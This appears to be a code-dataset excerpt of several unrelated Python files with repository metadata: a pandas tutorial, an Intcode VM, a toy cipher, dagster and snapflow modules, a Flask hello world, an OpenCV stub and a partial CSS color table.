# once and then commented out; only the final "Aggregate Statistics" section
# remains active.
# Dataframe is the Object type that Pandas allows to manipulate
import sys
# NOTE(review): machine-specific path hard-coded for the author's environment.
sys.path.append("/Users/SafetyFirst/Library/Python/3.9/lib/python/site-packages")
# import as = dont have to type pandas everytime, but just pd
import pandas as pd
import numpy as np
# together with importing numpy these four lines of code allow for a wider pycharm terminal output when displaying
# dataframe content
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
pd.set_option('display.max_columns',13)
pd.set_option('display.max_rows', None)
df = pd.read_csv('003_pokemon_data.csv')
#print(df.head(5))
# Reading Data in Pandas
## Read Headers
#print(df.columns)
## Read each Column
#print(df['Name'][0:5])
#print(df.Name)
#print(df[['Name', 'HP']][0:5])
## Read each row
#print(df.iloc[1])
#for index, row in df.iterrows():
#    print(index, row)
#for index, row in df.iterrows():
#    print(index, row['Name'])
#print(df.loc[df['Type 1'] == "Fire"])
## Read a specific location (R, C)
#print(df.iloc[2, 1])
# Sorting/Describing Data
#print(df.describe())
## ascending sorting by name
#print(df.sort_values('Name'))
##descending sorting
#print(df.sort_values('Name', ascending=False))
## sorting through multiple columns, ascending [1 = True, 0 = False] so first column will be sorted ascending
## and the second descending
#print(df.sort_values(['Type 1', 'HP'], ascending=[1,0]))
##Making Chancges to the data
##Adding a column
#df['Total'] = df['HP'] + df['Attack'] + df['Defense'] + df['Sp. Atk'] + df['Sp. Def'] + df['Speed']
#print(df[0:13])
## when adding totals, doublecheck if numbers match!
## , means all columns
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df)
## be careful with hardcoding numbers as tables change and that can screw everything up
## -> use variables (i.e. Pythons refractor instead of rename option)
## dropping columns
#print(df.drop(columns=['Legendary', 'Generation']))
## reordering data
## 1 just calling the columns you want
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df[['Name', 'Total', 'HP']])
## 2
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#print(df.head(5))
## saving to csv
## saving the modified file with the added total of all pokemon values and new sorting
##index=False, otherwise it would insert a indexing column at the front, which the df already has
## to csv, excel and TAB separated .txt
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#df.to_csv('pokemon_data_modified.csv', index=False)
#df.to_excel('pokemon_data_modified.xlsx', index=False)
#df.to_csv('pokemon_data_modified.txt', index=False, sep='\t')
## Filtering data
## filtering by one spec
#print(df.loc[df['Type 1'] == 'Grass'])
## filtering by two specs
## in pandas we use "&" instead of the "and" we'd normally use
## equally "or" is
#new_df = df.loc[(df['Type 1'] == 'Grass') & (df['Type 2'] == 'Poison') & (df['HP'] > 70)]
#print(new_df)
## this will keep the old index, to get rid of it:
#new_df = new_df.reset_index(drop=True)
#select Mega
#new_df.reset_index(drop=True, inplace=True)
#inverse select for non-Mega
#new_df = df.loc[~df["Name"].str.contains('Mega')]
# REGEX segment ommitted
#filtering for either or
#print(df.loc[(df["Type 1"] == "Grass") | (df["Type 1"] == "Fire")])
## Conditional Changes
##changing strings
#df.loc[df["Type 1"] == "Fire", "Type 1"] = "Flamer"
## one condition to set the parameter of another column
#df.loc[df["Type 1"] == "Fire", ["Legendary", "Generation"]] = ["TEST 1", "TEST2"]
## Aggregate Statistics (Groupby)
# Total = sum of the six stat columns (HP..Speed); then move it next to the id columns.
df['Total'] = df.iloc[:, 4:10].sum(axis=1)
cols = list(df.columns)
df = df[cols[0:4] + [cols[-1]] + cols[4:12]]
#print(df.groupby(["Type 1"]).mean().sort_values("HP", ascending=False))
#print(df.groupby(["Type 1"]).sum())
#print(df.groupby(["Type 1"]).count())
# Helper column so count() reports one clean number per (Type 1, Type 2) group.
df["count"] = 1
print(df.groupby(["Type 1", "Type 2"]).count()["count"])
#print(df)
|
[
"fizzad@gmail.com"
] |
fizzad@gmail.com
|
2b8a1159ab224c44e934263a6b9f5090c89352a0
|
47901d3483df111fe9b6f146691e58eecfa09c32
|
/13/intcode.py
|
6254b3853bf9397655b39b018240b3c0a8030a43
|
[] |
no_license
|
matus-pikuliak/advent_2019
|
1861ee4da7c01e038c80eeee1e03353f9907447f
|
67fcf18f66e53e886f945a5cdd7289b9439483db
|
refs/heads/master
| 2020-09-22T10:05:52.879745
| 2019-12-25T19:59:09
| 2019-12-25T19:59:09
| 225,149,977
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
class IntCode:
    """Advent-of-Code Intcode virtual machine.

    run() is a generator: opcode 4 yields an output value; opcode 3 first
    yields the sentinel -999 to request input, the caller supplies the value
    via send() (which resumes through one extra bare yield); opcode 99 halts.
    """

    def __init__(self, memory):
        # Program copy padded with 1000 zeroed cells of scratch space.
        self.mem = memory + [0] * 1000
        self.pointer = 0
        self.rel = 0  # relative base for mode-2 parameters

    def run(self):
        while True:
            word = f'{self.mem[self.pointer]:05}'
            opcode = word[-2:]
            if opcode == '99':  # halt
                break
            # Parameter modes, least-significant digit first.
            modes = [int(digit) for digit in word[2::-1]]
            # Resolve each of the (up to) three parameters to an address.
            params = []
            for offset in range(3):
                addr = self.pointer + offset + 1
                if modes[offset] == 0:      # position mode
                    params.append(self.mem[addr])
                elif modes[offset] == 1:    # immediate mode
                    params.append(addr)
                elif modes[offset] == 2:    # relative mode
                    params.append(self.mem[addr] + self.rel)
            if opcode == '01':    # add
                self.mem[params[2]] = self.mem[params[0]] + self.mem[params[1]]
                self.pointer += 4
            elif opcode == '02':  # multiply
                self.mem[params[2]] = self.mem[params[0]] * self.mem[params[1]]
                self.pointer += 4
            elif opcode == '03':  # input: signal -999, then receive via send()
                self.mem[params[0]] = yield -999
                yield
                self.pointer += 2
            elif opcode == '04':  # output
                yield self.mem[params[0]]
                self.pointer += 2
            elif opcode == '05':  # jump-if-true
                if self.mem[params[0]] != 0:
                    self.pointer = self.mem[params[1]]
                else:
                    self.pointer += 3
            elif opcode == '06':  # jump-if-false
                if self.mem[params[0]] == 0:
                    self.pointer = self.mem[params[1]]
                else:
                    self.pointer += 3
            elif opcode == '07':  # less-than
                self.mem[params[2]] = int(self.mem[params[0]] < self.mem[params[1]])
                self.pointer += 4
            elif opcode == '08':  # equals
                self.mem[params[2]] = int(self.mem[params[0]] == self.mem[params[1]])
                self.pointer += 4
            elif opcode == '09':  # adjust relative base
                self.rel += self.mem[params[0]]
                self.pointer += 2
|
[
"matus.pikuliak@stuba.sk"
] |
matus.pikuliak@stuba.sk
|
674a79a4698a5728e4c44718119f31a8b7728fc8
|
11595170c7b0d51505dabb3e330df875a95093c5
|
/RPCHitAnalyzer/WorkDir/getFileName.py
|
1349eb408ec0595606e17aceead6bf65a29a5488
|
[] |
no_license
|
ggrenier/CMSusercode
|
61d7e7ee25f7a0a68f48011d8ad798e85ea8a8a8
|
a90320daf8be5d1c2b448256b3e3fb0d907eb051
|
refs/heads/master
| 2021-01-10T11:23:20.668795
| 2016-03-11T13:46:34
| 2016-03-11T13:46:34
| 53,138,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
#special entries for the dictionnary passed by :
#'directory' is the directory where to put file, if not found, it is set to '../Data/'
#'startName' is the file startName, if not found, this is set to 'SingleMu_upscope'
#'extension' is the file extension, if not found, this is set to '.root'
#special entries for the dictionnary passed by :
#'directory' is the directory where to put file, if not found, it is set to '../Data/'
#'startName' is the file startName, if not found, this is set to 'SingleMu_upscope'
#'extension' is the file extension, if not found, this is set to '.root'
def generateFileName(paramsBydict):
    """Build a data file name from a parameter dictionary.

    Non-special keys are appended in sorted order as '_<key><value>'; the
    'nevents' value (if present) is appended last before the extension.
    """
    special_keys = ['directory', 'startName', 'nevents', 'extension']
    filename = paramsBydict.get('directory', '../Data/')
    filename = filename + paramsBydict.get('startName', 'SingleMu_upscope')
    for key in sorted(paramsBydict):
        if key not in special_keys:
            filename = filename + '_' + key + str(paramsBydict[key])
    if 'nevents' in paramsBydict:
        filename = filename + '_' + str(paramsBydict['nevents'])
    filename = filename + str(paramsBydict.get('extension', '.root'))
    return filename
if __name__ == "__main__":
    # Smoke test: build a name from a sample parameter set.
    # NOTE: the print *statement* below makes this file Python 2 only.
    a=dict()
    a['Pt']=60
    a['zvtx']=30
    a['etamin']=2.3
    a['nevents']=1000
    print generateFileName(a)
|
[
"grenier@ipnl.in2p3.fr"
] |
grenier@ipnl.in2p3.fr
|
b731f7bb0a905cd69ba11d5d934cc0ac33f22050
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/simple-cipher/7df478df5b6546c4b554e717f00f4c75.py
|
902cdef37788b91c86d3d3b606190688274c6913
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 1,338
|
py
|
'''cipher.py
created 6 Nov 2014
by @jestuber '''
import string
class Caesar(object):
    """Classic Caesar cipher: delegates to Cipher with its default key 'd'."""
    def __init__(self):
        super(Caesar, self).__init__()
        # self.arg = arg
    def encode(self,plaintext):
        # Shift each letter forward by the default key amount.
        return Cipher().encode(plaintext)
    def decode(self,encoded):
        # Inverse of encode().
        return Cipher().decode(encoded)
class Cipher(object):
    """Vigenere-style substitution cipher over lowercase letters.

    `key` is a string of lowercase letters whose alphabet indices are used
    as a rotating sequence of shifts. NOTE: this module is Python 2 only —
    it relies on string.lowercase and the two-argument str.translate.
    """
    def __init__(self, key='d'):
        super(Cipher, self).__init__()
        self.key = key
        # Per-letter shift amounts derived from the key (0 for 'a' .. 25 for 'z').
        self.shift = [string.lowercase.index(c) for c in key]
    def encode(self,plaintext):
        """Encrypt: strip punctuation/digits/spaces, lowercase, then shift."""
        encoded = []
        plaintext = plaintext.translate(None, string.punctuation+string.digits+' ').lower()
        ishift = 0
        for c in plaintext:
            plainkey = string.lowercase.index(c)
            newkey = plainkey + self.shift[ishift]
            # Wrap around the 26-letter alphabet.
            if newkey > 25:
                newkey -= 26
            encoded.append(string.lowercase[newkey])
            ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
        return ''.join(encoded)
    def decode(self,encoded):
        """Decrypt: the mirror of encode(), shifting backwards."""
        plaintext = []
        encoded = encoded.translate(None, string.punctuation+string.digits+' ').lower()
        ishift = 0
        for c in encoded:
            enckey = string.lowercase.index(c)
            newkey = enckey - self.shift[ishift]
            # Wrap around the 26-letter alphabet.
            if newkey < 0:
                newkey += 26
            plaintext.append(string.lowercase[newkey])
            ishift = 0 if ishift>=len(self.shift)-1 else ishift+1
        return ''.join(plaintext)
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
c74d3d817ada2bcf2794d7cffebfb2b3ccbf0e02
|
23a3c76882589d302b614da5f4be0fc626b4f3cd
|
/python_modules/dagster/dagster/api/snapshot_trigger.py
|
d9414b7c2318bcc7dc7ca624569ba3ba47f8ef8b
|
[
"Apache-2.0"
] |
permissive
|
DavidKatz-il/dagster
|
3641d04d387cdbe5535ae4f9726ce7dc1981a8c3
|
7c6d16eb8b3610a21020ecb479101db622d1535f
|
refs/heads/master
| 2022-12-20T13:08:36.462058
| 2020-09-14T18:12:12
| 2020-09-14T22:43:26
| 264,703,873
| 0
| 0
|
Apache-2.0
| 2020-06-16T09:49:00
| 2020-05-17T15:56:57
|
Python
|
UTF-8
|
Python
| false
| false
| 2,276
|
py
|
from dagster import check
from dagster.core.host_representation.external_data import (
ExternalExecutionParamsData,
ExternalExecutionParamsErrorData,
)
from dagster.core.host_representation.handle import RepositoryHandle
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.grpc.types import ExternalTriggeredExecutionArgs
from .utils import execute_unary_api_cli_command
def sync_get_external_trigger_execution_params(instance, repository_handle, trigger_name):
    """Fetch trigger execution params by shelling out to the repository's
    executable via the unary CLI API.

    Returns ExternalExecutionParamsData, or ExternalExecutionParamsErrorData
    when the external process reports a failure.
    """
    check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
    check.str_param(trigger_name, "trigger_name")
    origin = repository_handle.get_origin()
    return check.inst(
        execute_unary_api_cli_command(
            origin.executable_path,
            "trigger_execution_params",
            ExternalTriggeredExecutionArgs(
                repository_origin=origin,
                instance_ref=instance.get_ref(),
                trigger_name=trigger_name,
            ),
        ),
        (ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
    )
def sync_get_external_trigger_execution_params_ephemeral_grpc(
    instance, repository_handle, trigger_name
):
    """Same lookup as the gRPC variant, but over a short-lived gRPC server
    started for the repository's executable and torn down on exit."""
    # Imported lazily to avoid a module-level dependency on the gRPC client.
    from dagster.grpc.client import ephemeral_grpc_api_client

    origin = repository_handle.get_origin()
    with ephemeral_grpc_api_client(
        LoadableTargetOrigin(executable_path=origin.executable_path)
    ) as api_client:
        return sync_get_external_trigger_execution_params_grpc(
            api_client, instance, repository_handle, trigger_name
        )
def sync_get_external_trigger_execution_params_grpc(
    api_client, instance, repository_handle, trigger_name
):
    """Fetch trigger execution params over an already-connected gRPC client.

    Returns ExternalExecutionParamsData, or ExternalExecutionParamsErrorData
    when the server reports a failure.
    """
    check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
    check.str_param(trigger_name, "trigger_name")
    origin = repository_handle.get_origin()
    return check.inst(
        api_client.external_trigger_execution_params(
            external_triggered_execution_args=ExternalTriggeredExecutionArgs(
                repository_origin=origin,
                instance_ref=instance.get_ref(),
                trigger_name=trigger_name,
            )
        ),
        (ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
    )
|
[
"prha@elementl.com"
] |
prha@elementl.com
|
d8df3e108eb2a60fcac671fff7ece2212a4fd8a5
|
f0e11aeb7b5bd96c828cf39728eb2fa523f320df
|
/snapflow/cli/commands/generate.py
|
10a6882c60f47d5c9c2a9a96f8435d9b031bb621
|
[
"BSD-3-Clause"
] |
permissive
|
sathya-reddy-m/snapflow
|
7bc1fa7de7fd93b81e5b0538ba73ca68e9e109db
|
9e9e73f0d5a3d6b92f528ef1e2840ad92582502e
|
refs/heads/master
| 2023-05-01T05:14:08.479073
| 2021-05-21T00:14:56
| 2021-05-21T00:14:56
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,840
|
py
|
from __future__ import annotations
import os
from snapflow.cli.commands.base import SnapflowCommandBase
import sys
from contextlib import contextmanager
from importlib import import_module
from pathlib import Path
from types import ModuleType
from typing import List, Pattern
from cleo import Command
from snapflow.core.declarative.dataspace import DataspaceCfg
from snapflow.templates.generator import generate_template, insert_into_file
def strip_snapflow(s: str) -> str:
    """Drop a leading 'snapflow_' prefix from *s*, if present."""
    prefix = "snapflow_"
    if s.startswith(prefix):
        return s[len(prefix):]
    return s
class GenerateCommand(SnapflowCommandBase, Command):
    """
    Generate new snapflow component

    new
    {type : Type of component to generate (module, dataspace, function, schema, or flow)}
    {name : name of the component }
    {--s|namespace : namespace of the component, defaults to current module namespace }
    """
    # NOTE: the docstring above is parsed by cleo as the CLI specification —
    # do not reword it.

    def handle(self):
        # self.import_current_snapflow_module()
        # Dispatch to the matching handle_<type> method below.
        type_ = self.argument("type")
        name = self.argument("name")
        namespace = self.option("namespace")
        try:
            getattr(self, f"handle_{type_}")(name, namespace)
        except AttributeError:
            # No handle_<type> method exists for the requested type.
            raise ValueError(
                f"Invalid type {type_}, must be one of (module, dataspace, flow, function, schema)"
            )

    def handle_module(self, name: str, namespace: str):
        # Scaffold a new module; namespace defaults to the module name.
        namespace = namespace or name
        generate_template(
            "module", namespace=namespace, name=name,
        )
        # generate_template("tests", py_module_name=py_module_name, module_name=name)

    def handle_dataspace(self, name: str, namespace: str):
        # NOTE(review): assigns to `name` (not `namespace`) — inconsistent with
        # the other handlers; confirm this is intentional.
        name = namespace or name
        generate_template(
            "dataspace", name=name,
        )
        # Move single file back down to root (cookiecutter doesn't support)
        os.rename(f"{name}/snapflow.yml", "snapflow.yml")

    def handle_function(self, name: str, namespace: str):
        # Namespace comes from the current module's `namespace` attribute,
        # ignoring the CLI option. TODO(review): confirm the option should be ignored.
        module = self.import_current_snapflow_module()
        namespace = getattr(module, "namespace", None)
        with self.chdir_relative("functions"):
            generate_template("function", function_name=name, namespace=namespace)
        self.insert_function_into_current_init_file(name)

    def handle_schema(self, name: str, namespace: str):
        namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
        with self.chdir_relative("schemas"):
            generate_template("schema", schema_name=name, namespace=namespace)
        self.insert_schema_into_current_init_file(name)

    def handle_flow(self, name: str, namespace: str):
        namespace = strip_snapflow(namespace or self.get_current_snapflow_module_name())
        # NOTE(review): plain os.chdir here (no context manager), unlike the
        # handlers above — the working directory is not restored afterwards.
        os.chdir(self.abs_path("flows"))
        generate_template("flow", flow_name=name, namespace=namespace)
|
[
"kenvanharen@gmail.com"
] |
kenvanharen@gmail.com
|
93b50fe7cb62642f0337d0ffed643cb754d339e0
|
db1d9b55ac8e15182336d8fdbfcd5668d908fba6
|
/4_flask_restful_hello_world.py
|
db6e1ce37da625792a32e450fad8340a9a7356f2
|
[] |
no_license
|
sangameshBB/apis_with_flask
|
573694ac00bc9ddf443df977a119d678edc6e67f
|
81c088a048f1445b05ef151a74283778db1ad13d
|
refs/heads/master
| 2022-09-05T23:01:35.623221
| 2020-05-29T14:39:59
| 2020-05-29T14:39:59
| 267,879,329
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 289
|
py
|
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)


class HelloWorld(Resource):
    """Minimal flask-restful resource: GET / returns a static JSON greeting."""

    def get(self):
        return {'hello': 'world'}


# Mount the resource at the application root.
api.add_resource(HelloWorld, '/')

if __name__ == '__main__':
    # Development server only — debug=True must not be used in production.
    app.run(debug=True)
|
[
"noreply@github.com"
] |
sangameshBB.noreply@github.com
|
30a67ecaa65f58462ea307f9e7814f41c0df1c1a
|
2aace9bb170363e181eb7520e93def25f38dbe5c
|
/build/idea-sandbox/system/python_stubs/cache/2e033ce6e3a2cdde5174895cadb3b406b2a013729dd641fee2cebd9f7ed97879/cv2/cv2/StereoMatcher.py
|
7ab88dbc440f1ef092cd9bd0c28536beb666920f
|
[] |
no_license
|
qkpqkp/PlagCheck
|
13cb66fd2b2caa2451690bb72a2634bdaa07f1e6
|
d229904674a5a6e46738179c7494488ca930045e
|
refs/heads/master
| 2023-05-28T15:06:08.723143
| 2021-06-09T05:36:34
| 2021-06-09T05:36:34
| 375,235,940
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,845
|
py
|
# encoding: utf-8
# module cv2.cv2
# from C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
# by generator 1.147
""" Python wrapper for OpenCV. """
# imports
import cv2.cv2 as # C:\Users\Doly\Anaconda3\lib\site-packages\cv2\cv2.cp37-win_amd64.pyd
import cv2.Error as Error # <module 'cv2.Error'>
import cv2.aruco as aruco # <module 'cv2.aruco'>
import cv2.bgsegm as bgsegm # <module 'cv2.bgsegm'>
import cv2.bioinspired as bioinspired # <module 'cv2.bioinspired'>
import cv2.cuda as cuda # <module 'cv2.cuda'>
import cv2.datasets as datasets # <module 'cv2.datasets'>
import cv2.detail as detail # <module 'cv2.detail'>
import cv2.dnn as dnn # <module 'cv2.dnn'>
import cv2.face as face # <module 'cv2.face'>
import cv2.fisheye as fisheye # <module 'cv2.fisheye'>
import cv2.flann as flann # <module 'cv2.flann'>
import cv2.ft as ft # <module 'cv2.ft'>
import cv2.hfs as hfs # <module 'cv2.hfs'>
import cv2.img_hash as img_hash # <module 'cv2.img_hash'>
import cv2.instr as instr # <module 'cv2.instr'>
import cv2.ipp as ipp # <module 'cv2.ipp'>
import cv2.kinfu as kinfu # <module 'cv2.kinfu'>
import cv2.line_descriptor as line_descriptor # <module 'cv2.line_descriptor'>
import cv2.linemod as linemod # <module 'cv2.linemod'>
import cv2.ml as ml # <module 'cv2.ml'>
import cv2.motempl as motempl # <module 'cv2.motempl'>
import cv2.multicalib as multicalib # <module 'cv2.multicalib'>
import cv2.ocl as ocl # <module 'cv2.ocl'>
import cv2.ogl as ogl # <module 'cv2.ogl'>
import cv2.omnidir as omnidir # <module 'cv2.omnidir'>
import cv2.optflow as optflow # <module 'cv2.optflow'>
import cv2.plot as plot # <module 'cv2.plot'>
import cv2.ppf_match_3d as ppf_match_3d # <module 'cv2.ppf_match_3d'>
import cv2.quality as quality # <module 'cv2.quality'>
import cv2.reg as reg # <module 'cv2.reg'>
import cv2.rgbd as rgbd # <module 'cv2.rgbd'>
import cv2.saliency as saliency # <module 'cv2.saliency'>
import cv2.samples as samples # <module 'cv2.samples'>
import cv2.structured_light as structured_light # <module 'cv2.structured_light'>
import cv2.text as text # <module 'cv2.text'>
import cv2.utils as utils # <module 'cv2.utils'>
import cv2.videoio_registry as videoio_registry # <module 'cv2.videoio_registry'>
import cv2.videostab as videostab # <module 'cv2.videostab'>
import cv2.xfeatures2d as xfeatures2d # <module 'cv2.xfeatures2d'>
import cv2.ximgproc as ximgproc # <module 'cv2.ximgproc'>
import cv2.xphoto as xphoto # <module 'cv2.xphoto'>
import cv2 as __cv2
class StereoMatcher(__cv2.Algorithm):
    # no doc
    """IDE stub for cv2.StereoMatcher, auto-generated from the binary module.

    Every method body is a placeholder (`pass`); the real implementation
    lives in the compiled OpenCV extension.
    """
    def compute(self, left, right, disparity=None): # real signature unknown; restored from __doc__
        """
        compute(left, right[, disparity]) -> disparity
        .   @brief Computes disparity map for the specified stereo pair
        .
        .   @param left Left 8-bit single-channel image.
        .   @param right Right image of the same size and the same type as the left one.
        .   @param disparity Output disparity map. It has the same size as the input images. Some algorithms,
        .   like StereoBM or StereoSGBM compute 16-bit fixed-point disparity map (where each disparity value
        .   has 4 fractional bits), whereas other algorithms output 32-bit floating-point disparity map.
        """
        pass

    def getBlockSize(self): # real signature unknown; restored from __doc__
        """
        getBlockSize() -> retval
        .
        """
        pass

    def getDisp12MaxDiff(self): # real signature unknown; restored from __doc__
        """
        getDisp12MaxDiff() -> retval
        .
        """
        pass

    def getMinDisparity(self): # real signature unknown; restored from __doc__
        """
        getMinDisparity() -> retval
        .
        """
        pass

    def getNumDisparities(self): # real signature unknown; restored from __doc__
        """
        getNumDisparities() -> retval
        .
        """
        pass

    def getSpeckleRange(self): # real signature unknown; restored from __doc__
        """
        getSpeckleRange() -> retval
        .
        """
        pass

    def getSpeckleWindowSize(self): # real signature unknown; restored from __doc__
        """
        getSpeckleWindowSize() -> retval
        .
        """
        pass

    def setBlockSize(self, blockSize): # real signature unknown; restored from __doc__
        """
        setBlockSize(blockSize) -> None
        .
        """
        pass

    def setDisp12MaxDiff(self, disp12MaxDiff): # real signature unknown; restored from __doc__
        """
        setDisp12MaxDiff(disp12MaxDiff) -> None
        .
        """
        pass

    def setMinDisparity(self, minDisparity): # real signature unknown; restored from __doc__
        """
        setMinDisparity(minDisparity) -> None
        .
        """
        pass

    def setNumDisparities(self, numDisparities): # real signature unknown; restored from __doc__
        """
        setNumDisparities(numDisparities) -> None
        .
        """
        pass

    def setSpeckleRange(self, speckleRange): # real signature unknown; restored from __doc__
        """
        setSpeckleRange(speckleRange) -> None
        .
        """
        pass

    def setSpeckleWindowSize(self, speckleWindowSize): # real signature unknown; restored from __doc__
        """
        setSpeckleWindowSize(speckleWindowSize) -> None
        .
        """
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass

    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object.  See help(type) for accurate signature. """
        pass

    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass
|
[
"qinkunpeng2015@163.com"
] |
qinkunpeng2015@163.com
|
2e5db24847888b7364737d3edcf63f609a59d47b
|
65c001b5f572a6b0ca09dd9821016d628b745009
|
/frappe-bench/env/lib/python2.7/site-packages/cssutils/css/colors.py
|
0c4e4803b12d140e5337d66ce04c6406d01dfd2f
|
[
"MIT"
] |
permissive
|
ibrahmm22/library-management
|
666dffebdef1333db122c2a4a99286e7c174c518
|
b88a2129a5a2e96ce1f945ec8ba99a0b63b8c506
|
refs/heads/master
| 2022-10-30T17:53:01.238240
| 2020-06-11T18:36:41
| 2020-06-11T18:36:41
| 271,620,992
| 0
| 1
|
MIT
| 2022-10-23T05:04:57
| 2020-06-11T18:36:21
|
CSS
|
UTF-8
|
Python
| false
| false
| 6,669
|
py
|
# -*- coding: utf-8 -*-
"""
Built from something like this:
print [
(
row[2].text_content().strip(),
eval(row[4].text_content().strip())
)
for row in lxml.html.parse('http://www.w3.org/TR/css3-color/')
.xpath("//*[@class='colortable']//tr[position()>1]")
]
by Simon Sapin
"""
COLORS = {
'transparent': (0, 0, 0, 0.0),
'black': (0, 0, 0, 1.0),
'silver': (192, 192, 192, 1.0),
'gray': (128, 128, 128, 1.0),
'white': (255, 255, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'red': (255, 0, 0, 1.0),
'purple': (128, 0, 128, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'green': (0, 128, 0, 1.0),
'lime': (0, 255, 0, 1.0),
'olive': (128, 128, 0, 1.0),
'yellow': (255, 255, 0, 1.0),
'navy': (0, 0, 128, 1.0),
'blue': (0, 0, 255, 1.0),
'teal': (0, 128, 128, 1.0),
'aqua': (0, 255, 255, 1.0),
'aliceblue': (240, 248, 255, 1.0),
'antiquewhite': (250, 235, 215, 1.0),
'aqua': (0, 255, 255, 1.0),
'aquamarine': (127, 255, 212, 1.0),
'azure': (240, 255, 255, 1.0),
'beige': (245, 245, 220, 1.0),
'bisque': (255, 228, 196, 1.0),
'black': (0, 0, 0, 1.0),
'blanchedalmond': (255, 235, 205, 1.0),
'blue': (0, 0, 255, 1.0),
'blueviolet': (138, 43, 226, 1.0),
'brown': (165, 42, 42, 1.0),
'burlywood': (222, 184, 135, 1.0),
'cadetblue': (95, 158, 160, 1.0),
'chartreuse': (127, 255, 0, 1.0),
'chocolate': (210, 105, 30, 1.0),
'coral': (255, 127, 80, 1.0),
'cornflowerblue': (100, 149, 237, 1.0),
'cornsilk': (255, 248, 220, 1.0),
'crimson': (220, 20, 60, 1.0),
'cyan': (0, 255, 255, 1.0),
'darkblue': (0, 0, 139, 1.0),
'darkcyan': (0, 139, 139, 1.0),
'darkgoldenrod': (184, 134, 11, 1.0),
'darkgray': (169, 169, 169, 1.0),
'darkgreen': (0, 100, 0, 1.0),
'darkgrey': (169, 169, 169, 1.0),
'darkkhaki': (189, 183, 107, 1.0),
'darkmagenta': (139, 0, 139, 1.0),
'darkolivegreen': (85, 107, 47, 1.0),
'darkorange': (255, 140, 0, 1.0),
'darkorchid': (153, 50, 204, 1.0),
'darkred': (139, 0, 0, 1.0),
'darksalmon': (233, 150, 122, 1.0),
'darkseagreen': (143, 188, 143, 1.0),
'darkslateblue': (72, 61, 139, 1.0),
'darkslategray': (47, 79, 79, 1.0),
'darkslategrey': (47, 79, 79, 1.0),
'darkturquoise': (0, 206, 209, 1.0),
'darkviolet': (148, 0, 211, 1.0),
'deeppink': (255, 20, 147, 1.0),
'deepskyblue': (0, 191, 255, 1.0),
'dimgray': (105, 105, 105, 1.0),
'dimgrey': (105, 105, 105, 1.0),
'dodgerblue': (30, 144, 255, 1.0),
'firebrick': (178, 34, 34, 1.0),
'floralwhite': (255, 250, 240, 1.0),
'forestgreen': (34, 139, 34, 1.0),
'fuchsia': (255, 0, 255, 1.0),
'gainsboro': (220, 220, 220, 1.0),
'ghostwhite': (248, 248, 255, 1.0),
'gold': (255, 215, 0, 1.0),
'goldenrod': (218, 165, 32, 1.0),
'gray': (128, 128, 128, 1.0),
'green': (0, 128, 0, 1.0),
'greenyellow': (173, 255, 47, 1.0),
'grey': (128, 128, 128, 1.0),
'honeydew': (240, 255, 240, 1.0),
'hotpink': (255, 105, 180, 1.0),
'indianred': (205, 92, 92, 1.0),
'indigo': (75, 0, 130, 1.0),
'ivory': (255, 255, 240, 1.0),
'khaki': (240, 230, 140, 1.0),
'lavender': (230, 230, 250, 1.0),
'lavenderblush': (255, 240, 245, 1.0),
'lawngreen': (124, 252, 0, 1.0),
'lemonchiffon': (255, 250, 205, 1.0),
'lightblue': (173, 216, 230, 1.0),
'lightcoral': (240, 128, 128, 1.0),
'lightcyan': (224, 255, 255, 1.0),
'lightgoldenrodyellow': (250, 250, 210, 1.0),
'lightgray': (211, 211, 211, 1.0),
'lightgreen': (144, 238, 144, 1.0),
'lightgrey': (211, 211, 211, 1.0),
'lightpink': (255, 182, 193, 1.0),
'lightsalmon': (255, 160, 122, 1.0),
'lightseagreen': (32, 178, 170, 1.0),
'lightskyblue': (135, 206, 250, 1.0),
'lightslategray': (119, 136, 153, 1.0),
'lightslategrey': (119, 136, 153, 1.0),
'lightsteelblue': (176, 196, 222, 1.0),
'lightyellow': (255, 255, 224, 1.0),
'lime': (0, 255, 0, 1.0),
'limegreen': (50, 205, 50, 1.0),
'linen': (250, 240, 230, 1.0),
'magenta': (255, 0, 255, 1.0),
'maroon': (128, 0, 0, 1.0),
'mediumaquamarine': (102, 205, 170, 1.0),
'mediumblue': (0, 0, 205, 1.0),
'mediumorchid': (186, 85, 211, 1.0),
'mediumpurple': (147, 112, 219, 1.0),
'mediumseagreen': (60, 179, 113, 1.0),
